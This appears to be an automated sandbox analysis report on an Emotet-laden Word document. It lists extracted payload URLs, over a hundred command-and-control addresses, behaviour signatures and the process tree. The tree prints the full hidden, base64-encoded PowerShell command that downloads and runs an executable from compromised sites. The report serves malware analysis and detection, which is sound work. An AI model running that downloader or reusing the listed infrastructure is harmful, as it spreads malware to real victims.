Analysis
-
max time kernel
26s -
resource
win10v191014 -
submitted
28-01-2020 00:26
General
Malware Config
Extracted
http://camnangtrithuc.com/wp-admin/rysO51/
http://srgasia.com.my/wp-content/vmcG8715/
https://www.amedspor.com.tr/trsss/2aCO1Gkwg/
https://uklid.ir/cgi-bin/8v/
https://bffanmiefan.tk/cgi-bin/wYvv84846/
Extracted
emotet
190.6.193.152:8080
200.69.224.73:80
146.255.96.214:443
74.50.51.115:7080
184.172.27.82:8080
68.183.170.114:8080
45.79.95.107:443
190.210.184.138:995
200.58.83.179:80
113.190.254.245:80
181.29.101.13:8080
185.86.148.222:8080
186.200.205.170:80
139.47.135.215:80
62.75.160.178:8080
190.219.149.236:80
190.210.236.139:80
190.100.153.162:443
91.74.175.46:80
175.139.209.3:8080
200.82.170.231:80
79.7.114.1:80
187.54.225.76:80
69.163.33.84:8080
94.176.234.118:443
203.130.0.69:80
120.150.247.164:80
186.138.186.74:443
113.61.76.239:80
93.144.226.57:80
89.32.150.160:8080
73.125.15.41:80
191.183.21.190:80
192.241.143.52:8080
82.152.149.79:80
68.174.15.223:80
5.88.27.67:8080
189.78.156.8:80
188.216.24.204:80
144.139.228.113:443
185.94.252.12:80
178.79.163.131:8080
186.177.165.196:443
77.55.211.77:8080
212.71.237.140:8080
216.251.83.79:80
202.62.39.111:80
177.103.159.44:80
50.28.51.143:8080
175.114.178.83:443
188.135.15.49:80
72.29.55.174:80
190.17.44.48:80
81.16.1.45:80
68.183.190.199:8080
46.28.111.142:7080
188.218.104.226:80
68.62.245.148:80
190.186.164.23:80
81.213.78.151:443
190.101.144.224:80
186.15.83.52:8080
195.223.215.190:80
2.42.173.240:80
201.213.100.141:8080
114.109.179.60:80
203.25.159.3:8080
5.196.35.138:7080
181.231.220.232:80
109.166.89.91:80
186.68.48.204:443
91.83.93.124:7080
189.201.197.98:8080
94.200.126.42:80
200.123.183.137:443
207.154.204.40:8080
118.200.47.120:443
177.242.21.126:80
37.187.6.63:8080
181.36.42.205:443
191.103.76.34:443
110.170.65.146:80
37.120.185.153:443
190.24.243.186:80
190.131.167.50:80
94.200.114.162:80
181.30.61.163:80
91.242.136.103:80
70.184.69.146:80
2.47.112.72:80
149.62.173.247:8080
144.139.228.113:80
144.139.56.105:80
201.213.32.59:80
73.239.11.159:80
177.188.121.26:443
177.103.157.126:80
181.60.244.48:8080
190.195.129.227:8090
58.162.218.151:80
139.162.118.88:8080
80.11.158.65:8080
129.205.201.163:80
76.69.26.71:80
99.252.27.6:80
204.225.249.100:7080
82.196.15.205:8080
192.241.146.84:8080
91.72.179.214:80
186.15.52.123:80
151.231.7.154:80
87.106.77.40:7080
181.10.204.106:80
151.237.36.220:80
31.16.195.72:80
152.231.89.226:80
125.99.61.162:7080
189.19.81.181:443
2.45.112.134:80
151.80.142.33:80
142.93.114.137:8080
59.120.5.154:80
62.75.143.100:7080
138.68.106.4:7080
79.7.158.208:80
119.59.124.163:8080
172.104.169.32:8080
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4296 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Powershell.exe554.exemetricschannel.exedescription pid process target process PID 4296 wrote to memory of 4544 4296 Powershell.exe 554.exe PID 4544 wrote to memory of 4500 4544 554.exe 554.exe PID 4596 wrote to memory of 4672 4596 metricschannel.exe metricschannel.exe -
Executes dropped EXE 4 IoCs
Processes:
554.exe554.exemetricschannel.exemetricschannel.exepid process 4544 554.exe 4500 554.exe 4596 metricschannel.exe 4672 metricschannel.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4840 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4296 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
554.exemetricschannel.exepid process 4500 554.exe 4672 metricschannel.exe -
Drops file in System32 directory 1 IoCs
Processes:
554.exedescription ioc process File renamed C:\Users\Admin\554.exe => C:\Windows\SysWOW64\metricschannel.exe 554.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE554.exe554.exemetricschannel.exemetricschannel.exepid process 4840 WINWORD.EXE 4544 554.exe 4500 554.exe 4596 metricschannel.exe 4672 metricschannel.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4296 5036 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2bd5736f73a8966e4c1fdb9cfc8b1bac911a8b5520c5bde4eab406176eef0fb4.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4840
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAG4AbQB6AGMAeQB2AGoAZQBvAG8APQAnAFMAegBmAHMAcQBxAGYAcQB1AHUAZQBrAHMAJwA7ACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACAAPQAgACcANQA1ADQAJwA7ACQATgBmAHoAdgBpAG8AZgBsAD0AJwBVAHQAZwBiAHkAaABpAGMAdAB0ACcAOwAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACsAJwAuAGUAeABlACcAOwAkAFgAaQBxAHkAdAB0AGkAbwBrAGoAZwA9ACcASQBwAGUAcgBkAHUAdABjAGcAdwBsACcAOwAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBCAEMAbABpAGUATgBUADsAJABTAHcAeQBjAHgAYgBoAG4AcwB2AD0AJwBoAHQAdABwADoALwAvAGMAYQBtAG4AYQBuAGcAdAByAGkAdABoAHUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcgB5AHMATwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AcwByAGcAYQBzAGkAYQAuAGMAbwBtAC4AbQB5AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAbQBjAEcAOAA3ADEANQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBtAGUAZABzAHAAbwByAC4AYwBvAG0ALgB0AHIALwB0AHIAcwBzAHMALwAyAGEAQwBPADEARwBrAHcAZwAvACoAaAB0AHQAcABzADoALwAvAHUAawBsAGkAZAAuAGkAcgAvAGMAZwBpAC0AYgBpAG4ALwA4AHYALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGYAZgBhAG4AbQBpAGUAZgBhAG4ALgB0AGsALwBjAGcAaQAtAGIAaQBuAC8AdwBZAHYAdgA4ADQAOAA0ADYALwAnAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAdwBiAHEAdgB2AHcAdwBoAHIAZQBqAD0AJwBEAGIAegBrAG4AegBrAHAAcwBkACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAGgAYwBpAHUAZwBiAGcAYQB0AHQAYQAgAGkAbgAgACQAUwB3AHkAYwB4AGIAaABuAHMAdgApAHsAdAByAHkAewAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAC4AIgBkAE8AVwBuAGAATABgAG8AYQBkAGYASQBMAEUAIgAoACQAQwBoAGMAaQB1AGcAYgBnAGEAdAB0AGEALAAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkAOwAkAFoAbQBvAHIAbABmAG8AYQB4AG0AbQA9ACcASwBrAHUAYgB4AGEAaABpAGgAcQBiACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgA1ADAANQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwApADsAJABLAGkAZgBkAHgAZgBmAHcAawBpAHEAZgB6AD0AJwBPAHIAbwBnAHYAYwBvAHAAbwB2AGQAZAAnADsAYgByAGUAYQBrADsAJABXAG4AawB6AGgAZQBzAHIAaQBvAG8APQAnAEEAbQBrAHMAYQBtAG8AdAB5AG0AYQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAHMAcgBoAHUAYgB5AGYAbwB2AGYAZgA9ACcAQgB3AGkAegBzAG0AbwBvAGQAZQBkACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
PID:4296 -
C:\Users\Admin\554.exe"C:\Users\Admin\554.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4544 -
C:\Users\Admin\554.exe--c5cc5a523⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4500
-
-
-
C:\Windows\SysWOW64\metricschannel.exe"C:\Windows\SysWOW64\metricschannel.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4596 -
C:\Windows\SysWOW64\metricschannel.exe--6316d2f22⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4672
-